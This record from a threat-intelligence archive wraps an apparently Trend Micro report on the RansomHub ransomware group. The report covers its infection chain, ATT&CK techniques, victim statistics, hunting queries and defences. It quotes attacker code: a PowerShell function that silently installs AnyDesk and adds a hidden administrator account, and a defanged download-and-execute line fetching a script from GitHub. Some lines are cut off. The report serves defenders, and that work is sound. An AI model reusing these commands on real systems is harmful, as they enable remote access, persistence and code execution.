{
	"id": "579da2c6-3dcd-454b-9ba2-731db4cff47c",
	"created_at": "2026-04-29T02:21:56.739561Z",
	"updated_at": "2026-04-29T08:22:27.409558Z",
	"deleted_at": null,
	"sha1_hash": "5526f8cfcb8330fcbfb47450ab5cc83902f2aa71",
	"title": "Ransomware Spotlight: Ransomhub",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1059486,
	"plain_text": "Ransomware Spotlight: Ransomhub\r\nArchived: 2026-04-29 02:05:01 UTC\r\nInfection chain and techniques\r\nThe following section details the initial infection chain observed from RansomHub activity as illustrated in Figure 1.\r\nInitial Access\r\nThe RansomHub ransomware group uses spear-phishing voice scams for initial access. The cybercriminals use social engineering to orchestrate victim account password resets, employing speakers with a convincing American accent to lure victims. RansomHub also possibly uses compromised VPN accounts.\r\nExecution\r\nOperators behind RansomHub use PsExec to execute commands remotely on the victim’s machine. They have also been observed to use PowerShell scripts to execute commands related to credential access, discover remote systems, and establish SSH connections.\r\nThey have also been observed to use Python scripts to establish SSH connections, transfer the encryptor via Secure File Transfer Protocol (SFTP), and execute the encryptor simultaneously across multiple servers.\r\nPersistence\r\nRansomHub uses a local account to maintain access and adds the created user to administrator groups to maintain elevated access.\r\nDefense Evasion\r\nRansomHub drops and executes a batch file named disableAV.bat, detected as Trojan.BAT.KAPROCHANDLER.A. It copies and executes the binary used to terminate and delete antivirus-related processes and files. 
The binary used, detected as STONESTOP, uses a signed driver, detected as POORTRY, to delete files and terminate processes that are related to antivirus products.\r\nThe ransomware also uses another batch file to delete multiple registry subkeys and entries intended to bypass virus and threat protection settings in Windows.\r\nRansomHub also uses TDSSKiller to disable antivirus or EDR solutions in the target system and TOGGLEDEFENDER to disable Windows Defender.\r\nThe ransomware group also uses EDR Kill Shifter, a loader executable that uses the Bring Your Own Vulnerable Driver (BYOVD) technique. It exploits different vulnerable drivers to disable EDR protection.\r\nThe ransomware group also uses IOBit Unlocker to unlock files and folders that are locked by other processes or programs.\r\nCredential Access\r\nRansomHub uses MIMIKATZ, LaZagne, and SecretServerSecretStealer to retrieve passwords and credentials on their victims’ machines.\r\nThe ransomware group has also been observed to exploit the Veeam Backup \u0026 Replication component vulnerability CVE-2023-27532, where they connected to Veeam.Backup.Service.exe on TCP/9401, created a network share, and then created and executed a PowerShell script to dump credentials from the Veeam database to a text file. The group was also seen using Veeamp, a credential dumping tool specifically designed to extract credentials from the SQL database used by Veeam backup management software.\r\nA sample from the ransomware group has also been observed to conduct a brute-force attack on the domain controller, which was followed by an NTLMv1 logon to the domain controller. 
The group has also been observed extracting the NTDS.dit file, which is the database that stores Active Directory data, including users, groups, security descriptors, and password hashes.\r\nRansomHub also uses a PowerShell script that interacts with the CyberArk Privileged Access Security (PAS) solution to pull account information from safes and export it to a CSV file.\r\nDiscovery\r\nRansomHub operators use NetScan to discover and retrieve information about network devices. They also use Advanced Port Scanner to scan for open ports on network computers.\r\nhttps://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub\r\nPage 1 of 14\n\nLateral Movement\r\nRansomHub ransomware uses the cmd commands xcopy/copy to transfer the binary and driver used to terminate and delete antivirus-related processes and files, respectively. The group employs a PowerShell script to connect to a vCenter Server, retrieve all ESXi hosts, and configure the SSH service on each host to start automatically, enabling external SSH connections. The script also has the capability to reset the ESXi root user password and then disconnect from the vCenter Server.\r\nRansomHub operators also use an SMB spreader built on Impacket, which was provided to RansomHub affiliates. The SMB spreader runs a specified ransomware executable over the affected system’s local network.\r\nThe group also used SFTP to transfer the encryptor.\r\nCommand and Control\r\nRansomHub operators use Atera, Splashtop, AnyDesk, Ngrok, Screen Connect, and Remmina to gain remote access to victim machines.\r\nImpact\r\nRansomHub ransomware uses two encryption algorithms to encrypt target files: ECDH and AES. The ransomware then appends the 32-byte master public key from its configuration to the end of each encrypted file. The ransomware binary requires a -pass argument with a 32-byte passphrase to be specified when the ransomware is executed. 
The 32-byte passphrase is used to decrypt an embedded configuration during runtime, which contains the file extensions, file names, and folders to avoid, processes and services to terminate, as well as compromised login accounts.\r\nExfiltration\r\nRansomHub ransomware has been detected using the third-party tool and web service RClone to exfiltrate stolen information.\r\nFigures 2 and 3 illustrate the RansomHub infection chain from its observed campaigns in the fourth quarter of 2024.\r\nFigure 2. The RansomHub infection chain that uses NODESTEALER and XWORM\r\nFigure 3. RansomHub infection that uses a modified Secure Common Uninstall Tool (SCUT)\r\nThe following section details RansomHub infection chains that we investigated from the group’s observed campaigns in the fourth quarter of 2024.\r\nInitial Access\r\nRansomHub operators in their campaigns from the second half of 2024 until early 2025 were observed to use SocGholish, which typically uses drive-by compromises and social engineering tactics to trick users into downloading a malicious JavaScript payload masquerading as a browser update. After the execution of the initial payload, the malware establishes a command-and-control (C\u0026C) channel, allowing adversaries to perform further malicious actions.\r\nExecution\r\nRansomHub operators used Winhelper.ps1, x.ps1, and vcruntime.py to download and execute files and scripts from a GitHub repository.\r\nPrivilege Escalation\r\nThe RansomHub campaigns from the second half of 2024 to early 2025 showed the use of PowerRun, which is designed to run programs with TrustedInstaller (TI) privileges that usually provide higher permissions compared to Administrator privileges. 
This tool exploits Windows commands to elevate privileges and bypass standard security controls.\r\nCredential Access\r\nRansomHub uses NODESTEALER to retrieve browser cookies and login credentials from the victim’s system.\r\nDiscovery\r\nRansomHub operators also use nbtscan to conduct internal reconnaissance within a compromised network. It can also be used to scan IP networks, list NetBIOS computer names, collect MAC addresses, and list active users on a system.\r\nCommand and Control\r\nRansomHub also uses XWORM to connect to a command-and-control server, COBEACON for command execution and other functions, Python SOCKS5 Proxy Client to maintain access to compromised endpoints and deploy encryptors, Betruger for uploading files to the C\u0026C server and other functions, and Configure-SMRemoting to configure and enable PowerShell remoting on Windows systems.\r\nDefense Evasion\r\nRansomHub threat actors were observed using a modified version of the legitimate Secure Common Uninstall Tool (SCUT) that removes the verification of the JWT token and of whether the process was launched by a Trend Micro process. 
This modification allows attackers to mimic legitimate processes and perform malicious actions.\r\nRansomHub threat actors also used AMSI Bypass Patcher to alter the behavior of the AmsiScanBuffer function by locating and patching the memory address of the AmsiScanBuffer function within amsi.dll, which then allows potentially malicious code to bypass AMSI's detection mechanisms and execute without being flagged.\r\nThe RansomHub ransomware group also used GMER to detect and remove toolkits, as well as Uninstall-CS-ISG.bat, a batch file disguised as a CrowdStrike uninstall script, to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload.\r\nExfiltration\r\nRansomHub threat actors in their observed campaigns from the second half of 2024 to early 2025 used MEGAsync, an installable application that synchronizes folders between computers and MEGA Cloud Drives.\r\nImpact\r\nRansomHub actors used VeraCrypt to encrypt backup storage devices.\r\nMITRE tactics and techniques\r\nIn this section, we detail in two tables the MITRE tactics and techniques from the different campaigns we have observed from the RansomHub ransomware family. 
The first table enumerates the different MITRE tactics that the ransomware family used in its first observed campaign in the first half of 2024.\r\nInitial Access\r\n• T1078 - Valid Accounts: The ransomware group could have possibly used compromised VPN accounts.\r\n• T1566.004 - Phishing: Spearphishing Voice: Based on external reports, the ransomware group uses social engineering to orchestrate victim account password resets, particularly with American-accented speakers.\r\nExecution\r\n• T1059.001 - Command and Scripting Interpreter: PowerShell: Based on external reports, the ransomware group uses PowerShell scripts to execute commands related to credential access, discover remote systems, and enable the SSH service. The ransomware group also used a PowerShell script to download AnyDesk:\r\nFunction AnyDesk {\r\nmkdir \"C:\\ProgramData\\AnyDesk\"\r\n# Download AnyDesk\r\n$clnt = new-object System.Net.WebClient\r\n$url = \"hxxp://download[.]anydesk[.]com/AnyDesk.exe\"\r\n$file = \"C:\\ProgramData\\AnyDesk.exe\"\r\n$clnt.DownloadFile($url,$file)\r\ncmd.exe /c C:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent\r\ncmd.exe /c echo {redacted} | C:\\ProgramData\\anydesk.exe --set-password\r\nnet user {redacted} \"{redacted}\" /add\r\nnet localgroup Administrators {redacted} /ADD\r\nreg add \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v {redacted} /t REG_DWORD /d 0 /f\r\ncmd.exe /c C:\\ProgramData\\AnyDesk.exe --get-id\r\n}\r\n• T1059.006 - Command and Scripting Interpreter: Python: Based on external reports, the ransomware group utilizes a customized Python script to establish an SSH connection with targeted ESXi servers, transfer the encryptor via SFTP, confirm the successful transfer, and execute the encryptor simultaneously across multiple servers.\r\n• T1059.003 - Command and Scripting Interpreter: Windows Command Shell: The ransomware binary accepts the parameters shown in the original article's image; other versions of RansomHub accept the command line parameters shown in a second image. It can also execute supplied commands before its encryption routine by using the -cmd {command to execute} parameter.\r\nPersistence\r\n• T1136.001 - Create Account: Local Account: The ransomware group was able to execute commands via the net command-line utility to create a local account, maintaining access to victim systems.\r\n• T1098 - Account Manipulation: The ransomware group was able to execute commands via the net command-line utility to add the created user account to the administrator groups to maintain elevated access.\r\n• T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: If -safeboot is passed as an argument, the ransomware binary adds the following entry to the SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RunOnce registry key to execute itself upon reboot: *zCCyEs = {Malware File Path}\\{Malware File Name} -safeboot-instance -pass {32-byte passphrase}\r\n• T1547 - Boot or Logon Autostart Execution: The ransomware binary enables automatic logon by adding the following registry entries in SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon: AutoAdminLogon = 1; DefaultUserName = Administrator; DefaultDomainName = ; DefaultPassword = {random characters}. The credentials are then saved to a text file named user.txt. The login information is also displayed in the console.\r\nPrivilege Escalation\r\n• T1078.003 - Valid Accounts: Local Accounts: If -safeboot is passed as an argument, the ransomware binary attempts to log in as the administrator using the compromised usernames and passwords included in the credentials key in the encrypted configuration, using the LogonUserW API. If the login attempt fails, it enables automatic logon.\r\n• T1134.001 - Access Token Manipulation: Token Impersonation/Theft: The ransomware binary can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.\r\n(The Defense Evasion and later columns of this table are not legible in this copy.)\r\nThe following table details the MITRE tactics from its campaigns in the fourth quarter of 2024; while there are similarities with the TTPs used in the group's previous campaign in March 2024, there are also key differences that show how threat actors are continuously adapting more sophisticated techniques to circumvent defenses.\r\nInitial Access\r\n• T1566.001 - Phishing: Spearphishing Attachment: Based on our investigation, the threat actor likely utilized a phishing email containing a malicious ZIP file. Inside the ZIP file is a binary file masquerading as a PDF, which triggers the execution of the PowerShell script WinHelper.ps1 using the command: PowerShell -ep bypass -w hidden -f C:\\Users\\Public\\WinHelper.ps1\r\nExecution\r\n• T1059.001 - Command and Scripting Interpreter: PowerShell: The group was also observed to use a PowerShell downloader named WinHelper.ps1 to retrieve and execute another script from a GitHub repository:\r\n$url='hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/sp02/refs/heads/main/s' $url2='' $tExt20=((New-Ob\r\nSystem[.]Net[.]WebClient).DoWnloAdString('hxxps[://]raw[.]githubusercontent[.]com/poseidon1338/PowerShell/\r\niEx $text20\r\nRansomHub also used another PowerShell script named x.ps1 to download and extract an archived Python environment to the C:\\WinExplorer directory with the following steps:\r\n• The script first downloads a ZIP file from a Dropbox link and saves it as WinHelper.zip in C:\\WinExplorer\\.\r\n• It then uses Expand-Archive to extract the downloaded ZIP file into the C:\\WinExplorer\\ directory.\r\nThey also used the PowerShell script to create and execute Python files that will establish persistence and download a script from a GitHub repository with the following steps:\r\n• The script reads the content of a file (Gimport.dat) and stores it in $stct and $stct2, replaces placeholders %up% w[...] $url2, and writes the modified content into two new Python files: vcruntime140.py and vcruntime140d.py.\r\n• The script then executes the Python interpreter (python.exe) located in C:\\WinExplorer\\ to run the two generated Python files (vcruntime140.py and vcruntime140d.py).\r\nIn the previously mentioned February 2025 incident, a PowerShell script named 111.ps1 was used to execute diskpa[...]\r\n• T1059.006 - Command and Scripting Interpreter: Python: The group also dropped the Python scripts named vcruntime140.py and vcruntime140d.py, which ensure persistence b[...] in the startup folder to execute them when the system reboots.\r\n• T1059.003 - Command and Scripting Interpreter: Windows Command Shell: The group used a batch file disguised as a CrowdStrike uninstall script to transfer tools, uninstall CrowdStrike and Apex One agents, and execute the ransomware payload. Our investigation of the February 2025 incident showed that a batch file named g.bat was created, which was used t[...] the victim's machine.\r\n(Only the Initial Access and Execution columns of this table are legible in this copy.)\r\nSummary of malware, tools, and exploits used\r\nTable 1 summarizes the malware, techniques, and tools used by RansomHub actors in the initial infection chain that we first observed.\r\nExecution: PsExec\r\nPrivilege Escalation: CVE-2020-1472\r\nCredential Access: MIMIKATZ, LaZagne, CVE-2023-27532, SecretServerSecretStealer, Veeamp\r\nLateral Movement: SMB Spreader\r\nDiscovery: NetScan, Advanced Port Scanner\r\nCommand and Control: Atera, Splashtop, AnyDesk, Ngrok, Remmina, ConnectWise Screen Connect\r\nDefense Evasion: POORTRY, STONESTOP, TOGGLEDEFENDER, TDSSKiller, EDR Kill Shifter, IOBit Unlocker\r\nTable 1. Malware, techniques, and tools used in the RansomHub initial infection chain\r\nTable 2 lists the malware and tools used in the RansomHub infection chains that use NODESTEALER, XWORM, and a modified Secure Common Uninstall Tool (SCUT).\r\nInitial Access: SocGholish\r\nExecution: WinHelper.ps1, x.ps1, vcruntime.py\r\nPrivilege Escalation: PowerRun\r\nCredential Access: NODESTEALER\r\nDiscovery: nbtscan\r\nCommand and Control: XWORM, COBEACON, Python SOCKS5 Proxy Client, Betruger, Configure-SMRemoting\r\nDefense Evasion: Modified Secure Common Uninstall Tool (SCUT), AMSI Bypass Patcher, Deployment Image Servicing and Management Tool (DISM), GMER, Uninstall-CS-ISG.bat\r\nTable 2. Malware, techniques, and tools used in the RansomHub initial infections from November 2024 that used NODESTEALER, XWORM, and a modified Secure Common Uninstall Tool (SCUT).\r\nTop affected countries and industries from Trend Micro threat intelligence\r\nIn this section, we outline the activity of both the RansomHub ransomware and the Knight ransomware, as investigations suggest that the two are related. RansomHub was first reported in February 2024, but the first instance of an attempted attack in Trend Micro-covered systems was in April 2024. The Knight ransomware, on the other hand, has been active since January this year, when we began to track it in our telemetry. While it has been previously mentioned that RansomHub was declared inactive since April after the DragonForce takeover, Trend telemetry counted detections until July, when our endpoint sensors identified detection names connected to RansomHub.\r\nFigure 4. 
A monthly breakdown of attempted attacks from Knight ransomware and RansomHub ransomware (January 2024 to July 2025)\r\nKnight ransomware’s top targeted countries include Brazil, Türkiye, the United States, Ireland, and Israel, while RansomHub focused its efforts on targeting enterprises from the United States and Malaysia. Note that the country data for RansomHub and Knight ransomware do not include October 2024 to February 2025 detections due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data is available.\r\nFigure 5. A breakdown of the top countries targeted by the Knight and RansomHub ransomware groups (January to September 2024, April to July 2025)\r\nWhile many customers chose not to specify the industry to which they belong, data from those that did reveal that Knight ransomware targeted financial institutions the most, while RansomHub ransomware targeted the education sector the most. Note that the industry data for RansomHub and Knight ransomware do not include detections from October 2024 to February 2025 due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data is available.\r\nFigure 6. 
A breakdown of the top industries targeted by the Knight and RansomHub ransomware groups (January to September 2024, April to July 2025)\r\nTargeted regions and industries according to RansomHub ransomware’s leak site\r\nThis section looks at data based on attacks recorded on the leak site of the RansomHub ransomware and a combination of our open-source intelligence (OSINT) research and an investigation from February 2024 to March 2025.\r\nThe gang has so far added at least 748 victims to its leak site, but the actual victim count is likely higher.\r\nOf the total number of revealed victims, the RansomHub ransomware targeted enterprises in the North American region the most.\r\nFigure 7. The distribution by region of the RansomHub ransomware’s victim organizations, excluding victims with unknown locations\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nRansomHub targeted enterprises in the United States the most. The gang launched attacks on other countries fewer times, but its total of 748 victims comes from a wide range of at least 75 countries.\r\nFigure 8. The top 10 countries targeted by the RansomHub ransomware\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nThe majority of the RansomHub ransomware’s victim organizations were small businesses. The gang targeted medium businesses 65 times, and large enterprises only 38 times.\r\nFigure 9. 
The distribution by organization size of RansomHub’s victim organizations\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nThere are no outstanding sectors that RansomHub prefers to target, as its victimology by industry is spread out across sectors; however, the sector with the most attack counts, as revealed by its leak site, is the IT sector.\r\nFigure 10. A breakdown of the top 10 industries targeted by RansomHub ransomware attacks\r\nSources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. 
By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nThe following can be searched in the Trend Vision One Intelligence Reports dashboard for IOC sweeping:\r\n• RansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastructure Connection\r\n• [Hot Threats]: New Indicators for RANSOMHUB Ransomware\r\n• New RansomHub attack uses TDSKiller and LaZagne, disables EDR\r\n• StopRansomware: RansomHub Ransomware\r\nTrend Micro Vision One Threat Insights App\r\nTrend Vision One Hunting Query\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this feature with data in their environment.\r\nRansomHub Ransomware VSAPI Detections and Ransom Note:\r\nmalName:(*RANSOMHUB* or *KNIGHT*) AND eventName: MALWARE_DETECTION AND FileFullPath:(\"*\\\\README_*\")\r\nRansomHub Ransomware Process Execution:\r\nprocessCmd:\"/*cmd.exe /c iisreset.exe /stop*/\" AND processCmd:\"*powershell.exe -Command PowerShell -Command \"\\\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nRecommendations\r\nRansomHub ransomware is the latest evidence that cybercriminals can easily respawn and work together with other groups to maximize profits from their extortion schemes. 
Its links to the people behind BlackCat and Knight ransomware make it a formidable threat worth watching out for, especially as the group’s victimology in less than a year of activity suggests frequent and aggressive attacks.\r\nTo protect systems against RansomHub ransomware and other similar threats, organizations can implement security frameworks that allocate resources systematically to establish a strong defense strategy.\r\nThe following are some best practices that organizations can consider to help protect themselves from ransomware infections:\r\nAudit and inventory\r\n• Take an inventory of assets and data\r\n• Identify authorized and unauthorized devices and software\r\n• Make an audit of event and incident logs\r\nConfigure and monitor\r\n• Manage hardware and software configurations\r\n• Grant admin privileges and access only when necessary to an employee’s role\r\n• Monitor network ports, protocols, and services\r\n• Activate security configurations on network infrastructure devices such as firewalls and routers\r\n• Establish a software allow list that only executes legitimate applications\r\nPatch and update\r\n• Conduct regular vulnerability assessments\r\n• Perform patching or virtual patching for operating systems and applications\r\n• Update software and applications to their latest versions\r\nProtect and recover\r\n• Implement data protection, backup, and recovery measures\r\n• Enable multifactor authentication (MFA)\r\nSecure and defend\r\n• Employ sandbox analysis to block malicious emails\r\n• Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network\r\n• Detect early signs of an attack such as the presence of suspicious tools in the system\r\n• Use advanced detection technologies such as those powered by AI and machine learning\r\nTrain and test\r\n• Regularly 
train and assess employees on security skills\r\n• Conduct red-team exercises and penetration tests\r\nA multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior could help protect enterprises.\r\nTrend Vision One™ – Endpoint Security provides multilayered prevention and protection capabilities across every stage of the attack chain. Industry-leading intrusion prevention empowers you to mitigate known but unpatched threats, which can help block questionable behavior and tools early on before the ransomware can do irreversible damage to the system. Predict if files are malicious and detect indicators of attack before they get a chance to execute.\r\nTrend Vision One™ – Cloud Security provides advanced server security for physical, virtual, and cloud servers through file integrity monitoring, server intrusion prevention, and container security. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching.\r\nTrend Vision One™ – Email and Collaboration Security monitors employee risk levels in real time with email user risk assessments, swiftly detects and responds to user-targeted threats, and implements email security and prevention measures to disrupt the attack chain and effectively mitigate risk.\r\nSource: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub"
	],
	"report_names": [
		"ransomware-spotlight-ransomhub"
	],
	"threat_actors": [
		{
			"id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312",
			"created_at": "2024-06-07T02:00:03.998431Z",
			"updated_at": "2026-04-29T06:58:56.876406Z",
			"deleted_at": null,
			"main_name": "RansomHub",
			"aliases": [],
			"source_name": "MISPGALAXY:RansomHub",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6608b798-f92b-42af-a93f-d72800eeb3a3",
			"created_at": "2023-11-30T02:00:07.292Z",
			"updated_at": "2026-04-29T06:58:56.71531Z",
			"deleted_at": null,
			"main_name": "DragonForce",
			"aliases": [],
			"source_name": "MISPGALAXY:DragonForce",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "843f4240-33a7-4de4-8dcf-4ff9f9a8c758",
			"created_at": "2025-07-24T02:05:00.538379Z",
			"updated_at": "2026-04-29T06:58:57.518246Z",
			"deleted_at": null,
			"main_name": "GOLD FLAME",
			"aliases": [
				"DragonForce"
			],
			"source_name": "Secureworks:GOLD FLAME",
			"tools": [
				"ADFind",
				"AnyDesk",
				"Cobalt Strike",
				"FileSeek",
				"Mimikatz",
				"SoftPerfect Network Scanner",
				"SystemBC",
				"socks.exe"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1777429316,
	"ts_updated_at": 1777450947,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5526f8cfcb8330fcbfb47450ab5cc83902f2aa71.pdf",
		"text": "https://archive.orkl.eu/5526f8cfcb8330fcbfb47450ab5cc83902f2aa71.txt",
		"img": "https://archive.orkl.eu/5526f8cfcb8330fcbfb47450ab5cc83902f2aa71.jpg"
	}
}